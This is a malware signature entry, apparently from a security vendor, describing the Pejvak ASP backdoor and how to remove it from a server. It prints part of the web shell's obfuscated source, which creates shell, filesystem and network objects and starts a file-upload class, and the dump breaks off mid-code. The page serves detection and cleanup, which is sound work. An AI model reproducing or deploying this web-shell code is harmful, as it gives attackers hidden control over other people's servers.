Malware Signatures

  1. Home
  2. Malware Signatures
  3. asp.backdoor.pejvak.001

asp.backdoor.pejvak.001

This malware category is related to server-side malicious scripts which are commonly used as backdoors. The typical example of such backdoors are various File Managers, Web Shells, tools for bypassing admin login or various one-purpose scripts allowing the attacker to upload and run another type of malicious scripts. The payload is ASP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as Web Shell environment) is visible in the browser, not the malicious code itself. It's very common, that backdoors don't have any visible signs in the site code and it's impossible to detect them by accessing the infected site from outside. Server level analysis is necessary in case of infection by this type of malware.
This ASP backdoor was coded by a claimed iTsecteam member called Amin Shokohi (Pejvak) and it can be used my attackers to upload files, like other backdoors, defacement pages or illicit content, to the remote server.

Affecting

Any ASP based website, often through vulnerable code or compromised FTP credentials.

Cleanup

Search your server for the author name or it&#39s alias (Pejvak) in the files. Review the o results for any code that was injected inside valid files and remove the malicious content or the whole file if possible. Since it is a uploader class of malware, you may want to look for other strange files in your server.

Dump

<%
'----------------------------------------------------------------------
'       -----------------      Coded By Pejvak       -----------------
'       -----------------       Itsecteam.com        -----------------
'       -----------------  E-mail: pejv4k@yahoo.com  -----------------
'----------------------------------------------------------------------
On Error Resume Next
Set fileso = CreateObject("Script"&byp4ss&"ing.File"&byp4ss&"SystemObject")
dim head,endd,pathn,enddd
 FolderPath = Request.ServerVariables("PAT"&byp4ss&"H_TRANS"&byp4ss&"LATED")
Private Function ParseFolder(PathString)
 Dim liCount
 If Right(PathString, 1) = "\" Then
  ParseFolder = PathString
 Else
  For liCount = Len(PathString) To 1 Step -1
   If Mid(PathString, liCount, 1) = "\" Then
    ParseFolder = Left(PathString, liCount)
    Exit For
   End If
  Next
 End If
End Function
Function getsize(size)
If size>=(1024 * 1024 * 1024)Then getsize=Fix((size /(1024 * 1024 * 1024))* 100)/ 100&"G"
If size>=(1024 * 1024)And size<(1024 * 1024 * 1024)Then getsize=Fix((size /(1024 * 1024))* 100)/ 100&"M"
If size>=1024 And size<(1024 * 1024)Then getsize=Fix((size / 1024)* 100)/ 100&"K"
If size>=0 And size<1024 Then getsize=size&"B"
End Function
Set wssh = Server.CreateObject("W"&byp4ss&"Scr"&byp4ss&"ipt.Sh"&byp4ss&"ell")
Set envinfo = wssh.Environment("SY"&byp4ss&"STEM")
Set wsshn = Server.CreateObject("W"&byp4ss&"Sc"&byp4ss&"ript.Ne"&byp4ss&"twork")
Class FileUploader